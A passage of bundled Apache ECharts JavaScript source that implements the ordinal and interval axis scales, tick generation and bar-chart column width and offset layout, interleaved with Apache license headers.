*/\nScale.prototype.normalize = function (val) {\n    var extent = this._extent;\n    if (extent[1] === extent[0]) {\n        return 0.5;\n    }\n    return (val - extent[0]) / (extent[1] - extent[0]);\n};\n\n/**\n * Scale normalized value\n * @param {number} val\n * @return {number}\n */\nScale.prototype.scale = function (val) {\n    var extent = this._extent;\n    return val * (extent[1] - extent[0]) + extent[0];\n};\n\n/**\n * Set extent from data\n * @param {Array.<number>} other\n */\nScale.prototype.unionExtent = function (other) {\n    var extent = this._extent;\n    other[0] < extent[0] && (extent[0] = other[0]);\n    other[1] > extent[1] && (extent[1] = other[1]);\n    // not setExtent because in log axis it may transformed to power\n    // this.setExtent(extent[0], extent[1]);\n};\n\n/**\n * Set extent from data\n * @param {module:echarts/data/List} data\n * @param {string} dim\n */\nScale.prototype.unionExtentFromData = function (data, dim) {\n    this.unionExtent(data.getApproximateExtent(dim));\n};\n\n/**\n * Get extent\n * @return {Array.<number>}\n */\nScale.prototype.getExtent = function () {\n    return this._extent.slice();\n};\n\n/**\n * Set extent\n * @param {number} start\n * @param {number} end\n */\nScale.prototype.setExtent = function (start, end) {\n    var thisExtent = this._extent;\n    if (!isNaN(start)) {\n        thisExtent[0] = start;\n    }\n    if (!isNaN(end)) {\n        thisExtent[1] = end;\n    }\n};\n\n/**\n * When axis extent depends on data and no data exists,\n * axis ticks should not be drawn, which is named 'blank'.\n */\nScale.prototype.isBlank = function () {\n    return this._isBlank;\n},\n\n/**\n * When axis extent depends on data and no data exists,\n * axis ticks should not be drawn, which is named 'blank'.\n */\nScale.prototype.setBlank = function (isBlank) {\n    this._isBlank = isBlank;\n};\n\n/**\n * @abstract\n * @param {*} tick\n * @return {string} label of the tick.\n */\nScale.prototype.getLabel = null;\n\n\nenableClassExtend(Scale);\nenableClassManagement(Scale, {\n    registerWhenExtend: true\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @constructor\n * @param {Object} [opt]\n * @param {Object} [opt.categories=[]]\n * @param {Object} [opt.needCollect=false]\n * @param {Object} [opt.deduplication=false]\n */\nfunction OrdinalMeta(opt) {\n\n    /**\n     * @readOnly\n     * @type {Array.<string>}\n     */\n    this.categories = opt.categories || [];\n\n    /**\n     * @private\n     * @type {boolean}\n     */\n    this._needCollect = opt.needCollect;\n\n    /**\n     * @private\n     * @type {boolean}\n     */\n    this._deduplication = opt.deduplication;\n\n    /**\n     * @private\n     * @type {boolean}\n     */\n    this._map;\n}\n\n/**\n * @param {module:echarts/model/Model} axisModel\n * @return {module:echarts/data/OrdinalMeta}\n */\nOrdinalMeta.createByAxisModel = function (axisModel) {\n    var option = axisModel.option;\n    var data = option.data;\n    var categories = data && map(data, getName);\n\n    return new OrdinalMeta({\n        categories: categories,\n        needCollect: !categories,\n        // deduplication is default in axis.\n        deduplication: option.dedplication !== false\n    });\n};\n\nvar proto$1 = OrdinalMeta.prototype;\n\n/**\n * @param {string} category\n * @return {number} ordinal\n */\nproto$1.getOrdinal = function (category) {\n    return getOrCreateMap(this).get(category);\n};\n\n/**\n * @param {*} category\n * @return {number} The ordinal. If not found, return NaN.\n */\nproto$1.parseAndCollect = function (category) {\n    var index;\n    var needCollect = this._needCollect;\n\n    // The value of category dim can be the index of the given category set.\n    // This feature is only supported when !needCollect, because we should\n    // consider a common case: a value is 2017, which is a number but is\n    // expected to be tread as a category. This case usually happen in dataset,\n    // where it happent to be no need of the index feature.\n    if (typeof category !== 'string' && !needCollect) {\n        return category;\n    }\n\n    // Optimize for the scenario:\n    // category is ['2012-01-01', '2012-01-02', ...], where the input\n    // data has been ensured not duplicate and is large data.\n    // Notice, if a dataset dimension provide categroies, usually echarts\n    // should remove duplication except user tell echarts dont do that\n    // (set axis.deduplication = false), because echarts do not know whether\n    // the values in the category dimension has duplication (consider the\n    // parallel-aqi example)\n    if (needCollect && !this._deduplication) {\n        index = this.categories.length;\n        this.categories[index] = category;\n        return index;\n    }\n\n    var map$$1 = getOrCreateMap(this);\n    index = map$$1.get(category);\n\n    if (index == null) {\n        if (needCollect) {\n            index = this.categories.length;\n            this.categories[index] = category;\n            map$$1.set(category, index);\n        }\n        else {\n            index = NaN;\n        }\n    }\n\n    return index;\n};\n\n// Consider big data, do not create map until needed.\nfunction getOrCreateMap(ordinalMeta) {\n    return ordinalMeta._map || (\n        ordinalMeta._map = createHashMap(ordinalMeta.categories)\n    );\n}\n\nfunction getName(obj) {\n    if (isObject$1(obj) && obj.value != null) {\n        return obj.value;\n    }\n    else {\n        return obj + '';\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Linear continuous scale\n * @module echarts/coord/scale/Ordinal\n *\n * http://en.wikipedia.org/wiki/Level_of_measurement\n */\n\n// FIXME only one data\n\nvar scaleProto = Scale.prototype;\n\nvar OrdinalScale = Scale.extend({\n\n    type: 'ordinal',\n\n    /**\n     * @param {module:echarts/data/OrdianlMeta|Array.<string>} ordinalMeta\n     */\n    init: function (ordinalMeta, extent) {\n        // Caution: Should not use instanceof, consider ec-extensions using\n        // import approach to get OrdinalMeta class.\n        if (!ordinalMeta || isArray(ordinalMeta)) {\n            ordinalMeta = new OrdinalMeta({categories: ordinalMeta});\n        }\n        this._ordinalMeta = ordinalMeta;\n        this._extent = extent || [0, ordinalMeta.categories.length - 1];\n    },\n\n    parse: function (val) {\n        return typeof val === 'string'\n            ? this._ordinalMeta.getOrdinal(val)\n            // val might be float.\n            : Math.round(val);\n    },\n\n    contain: function (rank) {\n        rank = this.parse(rank);\n        return scaleProto.contain.call(this, rank)\n            && this._ordinalMeta.categories[rank] != null;\n    },\n\n    /**\n     * Normalize given rank or name to linear [0, 1]\n     * @param {number|string} [val]\n     * @return {number}\n     */\n    normalize: function (val) {\n        return scaleProto.normalize.call(this, this.parse(val));\n    },\n\n    scale: function (val) {\n        return Math.round(scaleProto.scale.call(this, val));\n    },\n\n    /**\n     * @return {Array}\n     */\n    getTicks: function () {\n        var ticks = [];\n        var extent = this._extent;\n        var rank = extent[0];\n\n        while (rank <= extent[1]) {\n            ticks.push(rank);\n            rank++;\n        }\n\n        return ticks;\n    },\n\n    /**\n     * Get item on rank n\n     * @param {number} n\n     * @return {string}\n     */\n    getLabel: function (n) {\n        if (!this.isBlank()) {\n            // Note that if no data, ordinalMeta.categories is an empty array.\n            return this._ordinalMeta.categories[n];\n        }\n    },\n\n    /**\n     * @return {number}\n     */\n    count: function () {\n        return this._extent[1] - this._extent[0] + 1;\n    },\n\n    /**\n     * @override\n     */\n    unionExtentFromData: function (data, dim) {\n        this.unionExtent(data.getApproximateExtent(dim));\n    },\n\n    getOrdinalMeta: function () {\n        return this._ordinalMeta;\n    },\n\n    niceTicks: noop,\n    niceExtent: noop\n});\n\n/**\n * @return {module:echarts/scale/Time}\n */\nOrdinalScale.create = function () {\n    return new OrdinalScale();\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * For testable.\n */\n\nvar roundNumber$1 = round$1;\n\n/**\n * @param {Array.<number>} extent Both extent[0] and extent[1] should be valid number.\n *                                Should be extent[0] < extent[1].\n * @param {number} splitNumber splitNumber should be >= 1.\n * @param {number} [minInterval]\n * @param {number} [maxInterval]\n * @return {Object} {interval, intervalPrecision, niceTickExtent}\n */\nfunction intervalScaleNiceTicks(extent, splitNumber, minInterval, maxInterval) {\n    var result = {};\n    var span = extent[1] - extent[0];\n\n    var interval = result.interval = nice(span / splitNumber, true);\n    if (minInterval != null && interval < minInterval) {\n        interval = result.interval = minInterval;\n    }\n    if (maxInterval != null && interval > maxInterval) {\n        interval = result.interval = maxInterval;\n    }\n    // Tow more digital for tick.\n    var precision = result.intervalPrecision = getIntervalPrecision(interval);\n    // Niced extent inside original extent\n    var niceTickExtent = result.niceTickExtent = [\n        roundNumber$1(Math.ceil(extent[0] / interval) * interval, precision),\n        roundNumber$1(Math.floor(extent[1] / interval) * interval, precision)\n    ];\n\n    fixExtent(niceTickExtent, extent);\n\n    return result;\n}\n\n/**\n * @param {number} interval\n * @return {number} interval precision\n */\nfunction getIntervalPrecision(interval) {\n    // Tow more digital for tick.\n    return getPrecisionSafe(interval) + 2;\n}\n\nfunction clamp(niceTickExtent, idx, extent) {\n    niceTickExtent[idx] = Math.max(Math.min(niceTickExtent[idx], extent[1]), extent[0]);\n}\n\n// In some cases (e.g., splitNumber is 1), niceTickExtent may be out of extent.\nfunction fixExtent(niceTickExtent, extent) {\n    !isFinite(niceTickExtent[0]) && (niceTickExtent[0] = extent[0]);\n    !isFinite(niceTickExtent[1]) && (niceTickExtent[1] = extent[1]);\n    clamp(niceTickExtent, 0, extent);\n    clamp(niceTickExtent, 1, extent);\n    if (niceTickExtent[0] > niceTickExtent[1]) {\n        niceTickExtent[0] = niceTickExtent[1];\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Interval scale\n * @module echarts/scale/Interval\n */\n\n\nvar roundNumber = round$1;\n\n/**\n * @alias module:echarts/coord/scale/Interval\n * @constructor\n */\nvar IntervalScale = Scale.extend({\n\n    type: 'interval',\n\n    _interval: 0,\n\n    _intervalPrecision: 2,\n\n    setExtent: function (start, end) {\n        var thisExtent = this._extent;\n        //start,end may be a Number like '25',so...\n        if (!isNaN(start)) {\n            thisExtent[0] = parseFloat(start);\n        }\n        if (!isNaN(end)) {\n            thisExtent[1] = parseFloat(end);\n        }\n    },\n\n    unionExtent: function (other) {\n        var extent = this._extent;\n        other[0] < extent[0] && (extent[0] = other[0]);\n        other[1] > extent[1] && (extent[1] = other[1]);\n\n        // unionExtent may called by it's sub classes\n        IntervalScale.prototype.setExtent.call(this, extent[0], extent[1]);\n    },\n    /**\n     * Get interval\n     */\n    getInterval: function () {\n        return this._interval;\n    },\n\n    /**\n     * Set interval\n     */\n    setInterval: function (interval) {\n        this._interval = interval;\n        // Dropped auto calculated niceExtent and use user setted extent\n        // We assume user wan't to set both interval, min, max to get a better result\n        this._niceExtent = this._extent.slice();\n\n        this._intervalPrecision = getIntervalPrecision(interval);\n    },\n\n    /**\n     * @param {boolean} [expandToNicedExtent=false] If expand the ticks to niced extent.\n     * @return {Array.<number>}\n     */\n    getTicks: function (expandToNicedExtent) {\n        var interval = this._interval;\n        var extent = this._extent;\n        var niceTickExtent = this._niceExtent;\n        var intervalPrecision = this._intervalPrecision;\n\n        var ticks = [];\n        // If interval is 0, return [];\n        if (!interval) {\n            return ticks;\n        }\n\n        // Consider this case: using dataZoom toolbox, zoom and zoom.\n        var safeLimit = 10000;\n\n        if (extent[0] < niceTickExtent[0]) {\n            if (expandToNicedExtent) {\n                ticks.push(roundNumber(niceTickExtent[0] - interval, intervalPrecision));\n            }\n            else {\n                ticks.push(extent[0]);\n            }\n        }\n        var tick = niceTickExtent[0];\n\n        while (tick <= niceTickExtent[1]) {\n            ticks.push(tick);\n            // Avoid rounding error\n            tick = roundNumber(tick + interval, intervalPrecision);\n            if (tick === ticks[ticks.length - 1]) {\n                // Consider out of safe float point, e.g.,\n                // -3711126.9907707 + 2e-10 === -3711126.9907707\n                break;\n            }\n            if (ticks.length > safeLimit) {\n                return [];\n            }\n        }\n        // Consider this case: the last item of ticks is smaller\n        // than niceTickExtent[1] and niceTickExtent[1] === extent[1].\n        var lastNiceTick = ticks.length ? ticks[ticks.length - 1] : niceTickExtent[1];\n        if (extent[1] > lastNiceTick) {\n            if (expandToNicedExtent) {\n                ticks.push(roundNumber(lastNiceTick + interval, intervalPrecision));\n            }\n            else {\n                ticks.push(extent[1]);\n            }\n        }\n\n        return ticks;\n    },\n\n    /**\n     * @param {number} [splitNumber=5]\n     * @return {Array.<Array.<number>>}\n     */\n    getMinorTicks: function (splitNumber) {\n        var ticks = this.getTicks(true);\n        var minorTicks = [];\n        var extent = this.getExtent();\n\n        for (var i = 1; i < ticks.length; i++) {\n            var nextTick = ticks[i];\n            var prevTick = ticks[i - 1];\n            var count = 0;\n            var minorTicksGroup = [];\n            var interval = nextTick - prevTick;\n            var minorInterval = interval / splitNumber;\n\n            while (count < splitNumber - 1) {\n                var minorTick = round$1(prevTick + (count + 1) * minorInterval);\n\n                // For the first and last interval. The count may be less than splitNumber.\n                if (minorTick > extent[0] && minorTick < extent[1]) {\n                    minorTicksGroup.push(minorTick);\n                }\n                count++;\n            }\n            minorTicks.push(minorTicksGroup);\n        }\n\n        return minorTicks;\n    },\n\n    /**\n     * @param {number} data\n     * @param {Object} [opt]\n     * @param {number|string} [opt.precision] If 'auto', use nice presision.\n     * @param {boolean} [opt.pad] returns 1.50 but not 1.5 if precision is 2.\n     * @return {string}\n     */\n    getLabel: function (data, opt) {\n        if (data == null) {\n            return '';\n        }\n\n        var precision = opt && opt.precision;\n\n        if (precision == null) {\n            precision = getPrecisionSafe(data) || 0;\n        }\n        else if (precision === 'auto') {\n            // Should be more precise then tick.\n            precision = this._intervalPrecision;\n        }\n\n        // (1) If `precision` is set, 12.005 should be display as '12.00500'.\n        // (2) Use roundNumber (toFixed) to avoid scientific notation like '3.5e-7'.\n        data = roundNumber(data, precision, true);\n\n        return addCommas(data);\n    },\n\n    /**\n     * Update interval and extent of intervals for nice ticks\n     *\n     * @param {number} [splitNumber = 5] Desired number of ticks\n     * @param {number} [minInterval]\n     * @param {number} [maxInterval]\n     */\n    niceTicks: function (splitNumber, minInterval, maxInterval) {\n        splitNumber = splitNumber || 5;\n        var extent = this._extent;\n        var span = extent[1] - extent[0];\n        if (!isFinite(span)) {\n            return;\n        }\n        // User may set axis min 0 and data are all negative\n        // FIXME If it needs to reverse ?\n        if (span < 0) {\n            span = -span;\n            extent.reverse();\n        }\n\n        var result = intervalScaleNiceTicks(\n            extent, splitNumber, minInterval, maxInterval\n        );\n\n        this._intervalPrecision = result.intervalPrecision;\n        this._interval = result.interval;\n        this._niceExtent = result.niceTickExtent;\n    },\n\n    /**\n     * Nice extent.\n     * @param {Object} opt\n     * @param {number} [opt.splitNumber = 5] Given approx tick number\n     * @param {boolean} [opt.fixMin=false]\n     * @param {boolean} [opt.fixMax=false]\n     * @param {boolean} [opt.minInterval]\n     * @param {boolean} [opt.maxInterval]\n     */\n    niceExtent: function (opt) {\n        var extent = this._extent;\n        // If extent start and end are same, expand them\n        if (extent[0] === extent[1]) {\n            if (extent[0] !== 0) {\n                // Expand extent\n                var expandSize = extent[0];\n                // In the fowllowing case\n                //      Axis has been fixed max 100\n                //      Plus data are all 100 and axis extent are [100, 100].\n                // Extend to the both side will cause expanded max is larger than fixed max.\n                // So only expand to the smaller side.\n                if (!opt.fixMax) {\n                    extent[1] += expandSize / 2;\n                    extent[0] -= expandSize / 2;\n                }\n                else {\n                    extent[0] -= expandSize / 2;\n                }\n            }\n            else {\n                extent[1] = 1;\n            }\n        }\n        var span = extent[1] - extent[0];\n        // If there are no data and extent are [Infinity, -Infinity]\n        if (!isFinite(span)) {\n            extent[0] = 0;\n            extent[1] = 1;\n        }\n\n        this.niceTicks(opt.splitNumber, opt.minInterval, opt.maxInterval);\n\n        // var extent = this._extent;\n        var interval = this._interval;\n\n        if (!opt.fixMin) {\n            extent[0] = roundNumber(Math.floor(extent[0] / interval) * interval);\n        }\n        if (!opt.fixMax) {\n            extent[1] = roundNumber(Math.ceil(extent[1] / interval) * interval);\n        }\n    }\n});\n\n/**\n * @return {module:echarts/scale/Time}\n */\nIntervalScale.create = function () {\n    return new IntervalScale();\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/* global Float32Array */\n\nvar STACK_PREFIX = '__ec_stack_';\nvar LARGE_BAR_MIN_WIDTH = 0.5;\n\nvar LargeArr = typeof Float32Array !== 'undefined' ? Float32Array : Array;\n\nfunction getSeriesStackId(seriesModel) {\n    return seriesModel.get('stack') || STACK_PREFIX + seriesModel.seriesIndex;\n}\n\nfunction getAxisKey(axis) {\n    return axis.dim + axis.index;\n}\n\n/**\n * @param {Object} opt\n * @param {module:echarts/coord/Axis} opt.axis Only support category axis currently.\n * @param {number} opt.count Positive interger.\n * @param {number} [opt.barWidth]\n * @param {number} [opt.barMaxWidth]\n * @param {number} [opt.barMinWidth]\n * @param {number} [opt.barGap]\n * @param {number} [opt.barCategoryGap]\n * @return {Object} {width, offset, offsetCenter} If axis.type is not 'category', return undefined.\n */\nfunction getLayoutOnAxis(opt) {\n    var params = [];\n    var baseAxis = opt.axis;\n    var axisKey = 'axis0';\n\n    if (baseAxis.type !== 'category') {\n        return;\n    }\n    var bandWidth = baseAxis.getBandWidth();\n\n    for (var i = 0; i < opt.count || 0; i++) {\n        params.push(defaults({\n            bandWidth: bandWidth,\n            axisKey: axisKey,\n            stackId: STACK_PREFIX + i\n        }, opt));\n    }\n    var widthAndOffsets = doCalBarWidthAndOffset(params);\n\n    var result = [];\n    for (var i = 0; i < opt.count; i++) {\n        var item = widthAndOffsets[axisKey][STACK_PREFIX + i];\n        item.offsetCenter = item.offset + item.width / 2;\n        result.push(item);\n    }\n\n    return result;\n}\n\nfunction prepareLayoutBarSeries(seriesType, ecModel) {\n    var seriesModels = [];\n    ecModel.eachSeriesByType(seriesType, function (seriesModel) {\n        // Check series coordinate, do layout for cartesian2d only\n        if (isOnCartesian(seriesModel) && !isInLargeMode(seriesModel)) {\n            seriesModels.push(seriesModel);\n        }\n    });\n    return seriesModels;\n}\n\n\n/**\n * Map from (baseAxis.dim + '_' + baseAxis.index) to min gap of two adjacent\n * values.\n * This works for time axes, value axes, and log axes.\n * For a single time axis, return value is in the form like\n * {'x_0': [1000000]}.\n * The value of 1000000 is in milliseconds.\n */\nfunction getValueAxesMinGaps(barSeries) {\n    /**\n     * Map from axis.index to values.\n     * For a single time axis, axisValues is in the form like\n     * {'x_0': [1495555200000, 1495641600000, 1495728000000]}.\n     * Items in axisValues[x], e.g. 1495555200000, are time values of all\n     * series.\n     */\n    var axisValues = {};\n    each$1(barSeries, function (seriesModel) {\n        var cartesian = seriesModel.coordinateSystem;\n        var baseAxis = cartesian.getBaseAxis();\n        if (baseAxis.type !== 'time' && baseAxis.type !== 'value') {\n            return;\n        }\n\n        var data = seriesModel.getData();\n        var key = baseAxis.dim + '_' + baseAxis.index;\n        var dim = data.mapDimension(baseAxis.dim);\n        for (var i = 0, cnt = data.count(); i < cnt; ++i) {\n            var value = data.get(dim, i);\n            if (!axisValues[key]) {\n                // No previous data for the axis\n                axisValues[key] = [value];\n            }\n            else {\n                // No value in previous series\n                axisValues[key].push(value);\n            }\n            // Ignore duplicated time values in the same axis\n        }\n    });\n\n    var axisMinGaps = [];\n    for (var key in axisValues) {\n        if (axisValues.hasOwnProperty(key)) {\n            var valuesInAxis = axisValues[key];\n            if (valuesInAxis) {\n                // Sort axis values into ascending order to calculate gaps\n                valuesInAxis.sort(function (a, b) {\n                    return a - b;\n                });\n\n                var min = null;\n                for (var j = 1; j < valuesInAxis.length; ++j) {\n                    var delta = valuesInAxis[j] - valuesInAxis[j - 1];\n                    if (delta > 0) {\n                        // Ignore 0 delta because they are of the same axis value\n                        min = min === null ? delta : Math.min(min, delta);\n                    }\n                }\n                // Set to null if only have one data\n                axisMinGaps[key] = min;\n            }\n        }\n    }\n    return axisMinGaps;\n}\n\nfunction makeColumnLayout(barSeries) {\n    var axisMinGaps = getValueAxesMinGaps(barSeries);\n\n    var seriesInfoList = [];\n    each$1(barSeries, function (seriesModel) {\n        var cartesian = seriesModel.coordinateSystem;\n        var baseAxis = cartesian.getBaseAxis();\n        var axisExtent = baseAxis.getExtent();\n\n        var bandWidth;\n        if (baseAxis.type === 'category') {\n            bandWidth = baseAxis.getBandWidth();\n        }\n        else if (baseAxis.type === 'value' || baseAxis.type === 'time') {\n            var key = baseAxis.dim + '_' + baseAxis.index;\n            var minGap = axisMinGaps[key];\n            var extentSpan = Math.abs(axisExtent[1] - axisExtent[0]);\n            var scale = baseAxis.scale.getExtent();\n            var scaleSpan = Math.abs(scale[1] - scale[0]);\n            bandWidth = minGap\n                ? extentSpan / scaleSpan * minGap\n                : extentSpan; // When there is only one data value\n        }\n        else {\n            var data = seriesModel.getData();\n            bandWidth = Math.abs(axisExtent[1] - axisExtent[0]) / data.count();\n        }\n\n        var barWidth = parsePercent$1(\n            seriesModel.get('barWidth'), bandWidth\n        );\n        var barMaxWidth = parsePercent$1(\n            seriesModel.get('barMaxWidth'), bandWidth\n        );\n        var barMinWidth = parsePercent$1(\n            // barMinWidth by default is 1 in cartesian. Because in value axis,\n            // the auto-calculated bar width might be less than 1.\n            seriesModel.get('barMinWidth') || 1, bandWidth\n        );\n        var barGap = seriesModel.get('barGap');\n        var barCategoryGap = seriesModel.get('barCategoryGap');\n\n        seriesInfoList.push({\n            bandWidth: bandWidth,\n            barWidth: barWidth,\n            barMaxWidth: barMaxWidth,\n            barMinWidth: barMinWidth,\n            barGap: barGap,\n            barCategoryGap: barCategoryGap,\n            axisKey: getAxisKey(baseAxis),\n            stackId: getSeriesStackId(seriesModel)\n        });\n    });\n\n    return doCalBarWidthAndOffset(seriesInfoList);\n}\n\nfunction doCalBarWidthAndOffset(seriesInfoList) {\n    // Columns info on each category axis. Key is cartesian name\n    var columnsMap = {};\n\n    each$1(seriesInfoList, function (seriesInfo, idx) {\n        var axisKey = seriesInfo.axisKey;\n        var bandWidth = seriesInfo.bandWidth;\n        var columnsOnAxis = columnsMap[axisKey] || {\n            bandWidth: bandWidth,\n            remainedWidth: bandWidth,\n            autoWidthCount: 0,\n            categoryGap: '20%',\n            gap: '30%',\n            stacks: {}\n        };\n        var stacks = columnsOnAxis.stacks;\n        columnsMap[axisKey] = columnsOnAxis;\n\n        var stackId = seriesInfo.stackId;\n\n        if (!stacks[stackId]) {\n            columnsOnAxis.autoWidthCount++;\n        }\n        stacks[stackId] = stacks[stackId] || {\n            width: 0,\n            maxWidth: 0\n        };\n\n        // Caution: In a single coordinate system, these barGrid attributes\n        // will be shared by series. Consider that they have default values,\n        // only the attributes set on the last series will work.\n        // Do not change this fact unless there will be a break change.\n\n        var barWidth = seriesInfo.barWidth;\n        if (barWidth && !stacks[stackId].width) {\n            // See #6312, do not restrict width.\n            stacks[stackId].width = barWidth;\n            barWidth = Math.min(columnsOnAxis.remainedWidth, barWidth);\n            columnsOnAxis.remainedWidth -= barWidth;\n        }\n\n        var barMaxWidth = seriesInfo.barMaxWidth;\n        barMaxWidth && (stacks[stackId].maxWidth = barMaxWidth);\n        var barMinWidth = seriesInfo.barMinWidth;\n        barMinWidth && (stacks[stackId].minWidth = barMinWidth);\n        var barGap = seriesInfo.barGap;\n        (barGap != null) && (columnsOnAxis.gap = barGap);\n        var barCategoryGap = seriesInfo.barCategoryGap;\n        (barCategoryGap != null) && (columnsOnAxis.categoryGap = barCategoryGap);\n    });\n\n    var result = {};\n\n    each$1(columnsMap, function (columnsOnAxis, coordSysName) {\n\n        result[coordSysName] = {};\n\n        var stacks = columnsOnAxis.stacks;\n        var bandWidth = columnsOnAxis.bandWidth;\n        var categoryGap = parsePercent$1(columnsOnAxis.categoryGap, bandWidth);\n        var barGapPercent = parsePercent$1(columnsOnAxis.gap, 1);\n\n        var remainedWidth = columnsOnAxis.remainedWidth;\n        var autoWidthCount = columnsOnAxis.autoWidthCount;\n        var autoWidth = (remainedWidth - categoryGap)\n            / (autoWidthCount + (autoWidthCount - 1) * barGapPercent);\n        autoWidth = Math.max(autoWidth, 0);\n\n        // Find if any auto calculated bar exceeded maxBarWidth\n        each$1(stacks, function (column) {\n            var maxWidth = column.maxWidth;\n            var minWidth = column.minWidth;\n\n            if (!column.width) {\n                var finalWidth = autoWidth;\n                if (maxWidth && maxWidth < finalWidth) {\n                    finalWidth = Math.min(maxWidth, remainedWidth);\n                }\n                // `minWidth` has higher priority. `minWidth` decide that wheter the\n                // bar is able to be visible. So `minWidth` should not be restricted\n                // by `maxWidth` or `remainedWidth` (which is from `bandWidth`). In\n                // the extreme cases for `value` axis, bars are allowed to overlap\n                // with each other if `minWidth` specified.\n                if (minWidth && minWidth > finalWidth) {\n                    finalWidth = minWidth;\n                }\n                if (finalWidth !== autoWidth) {\n                    column.width = finalWidth;\n                    remainedWidth -= finalWidth + barGapPercent * finalWidth;\n                    autoWidthCount--;\n                }\n            }\n            else {\n                // `barMinWidth/barMaxWidth` has higher priority than `barWidth`, as\n                // CSS does. Becuase barWidth can be a percent value, where\n                // `barMaxWidth` can be used to restrict the final width.\n                var finalWidth = column.width;\n                if (maxWidth) {\n                    finalWidth = Math.min(finalWidth, maxWidth);\n                }\n                // `minWidth` has higher priority, as described above\n                if (minWidth) {\n                    finalWidth = Math.max(finalWidth, minWidth);\n                }\n                column.width = finalWidth;\n                remainedWidth -= finalWidth + barGapPercent * finalWidth;\n                autoWidthCount--;\n            }\n        });\n\n        // Recalculate width again\n        autoWidth = (remainedWidth - categoryGap)\n            / (autoWidthCount + (autoWidthCount - 1) * barGapPercent);\n\n        autoWidth = Math.max(autoWidth, 0);\n\n\n        var widthSum = 0;\n        var lastColumn;\n        each$1(stacks, function (column, idx) {\n            if (!column.width) {\n                column.width = autoWidth;\n            }\n            lastColumn = column;\n            widthSum += column.width * (1 + barGapPercent);\n        });\n        if (lastColumn) {\n            widthSum -= lastColumn.width * barGapPercent;\n        }\n\n        var offset = -widthSum / 2;\n        each$1(stacks, function (column, stackId) {\n            result[coordSysName][stackId] = result[coordSysName][stackId] || {\n                bandWidth: bandWidth,\n                offset: offset,\n                width: column.width\n            };\n\n            offset += column.width * (1 + barGapPercent);\n        });\n    });\n\n    return result;\n}\n\n/**\n * @param {Object} barWidthAndOffset The result of makeColumnLayout\n * @param {module:echarts/coord/Axis} axis\n * @param {module:echarts/model/Series} [seriesModel] If not provided, return all.\n * @return {Object} {stackId: {offset, width}} or {offset, width} if seriesModel provided.\n */\nfunction retrieveColumnLayout(barWidthAndOffset, axis, seriesModel) {\n    if (barWidthAndOffset && axis) {\n        var result = barWidthAndOffset[getAxisKey(axis)];\n        if (result != null && seriesModel != null) {\n            result = result[getSeriesStackId(seriesModel)];\n        }\n        return result;\n    }\n}\n\n/**\n * @param {string} seriesType\n * @param {module:echarts/model/Global} ecModel\n */\nfunction layout(seriesType, ecModel) {\n\n    var seriesModels = prepareLayoutBarSeries(seriesType, ecModel);\n    var barWidthAndOffset = makeColumnLayout(seriesModels);\n\n    var lastStackCoords = {};\n    each$1(seriesModels, function (seriesModel) {\n\n        var data = seriesModel.getData();\n        var cartesian = seriesModel.coordinateSystem;\n        var baseAxis = cartesian.getBaseAxis();\n\n        var stackId = getSeriesStackId(seriesModel);\n        var columnLayoutInfo = barWidthAndOffset[getAxisKey(baseAxis)][stackId];\n        var columnOffset = columnLayoutInfo.offset;\n        var columnWidth = columnLayoutInfo.width;\n        var valueAxis = cartesian.getOtherAxis(baseAxis);\n\n        var barMinHeight = seriesModel.get('barMinHeight') || 0;\n\n        lastStackCoords[stackId] = lastStackCoords[stackId] || [];\n        data.setLayout({\n            bandWidth: columnLayoutInfo.bandWidth,\n            offset: columnOffset,\n            size: columnWidth\n        });\n\n        var valueDim = 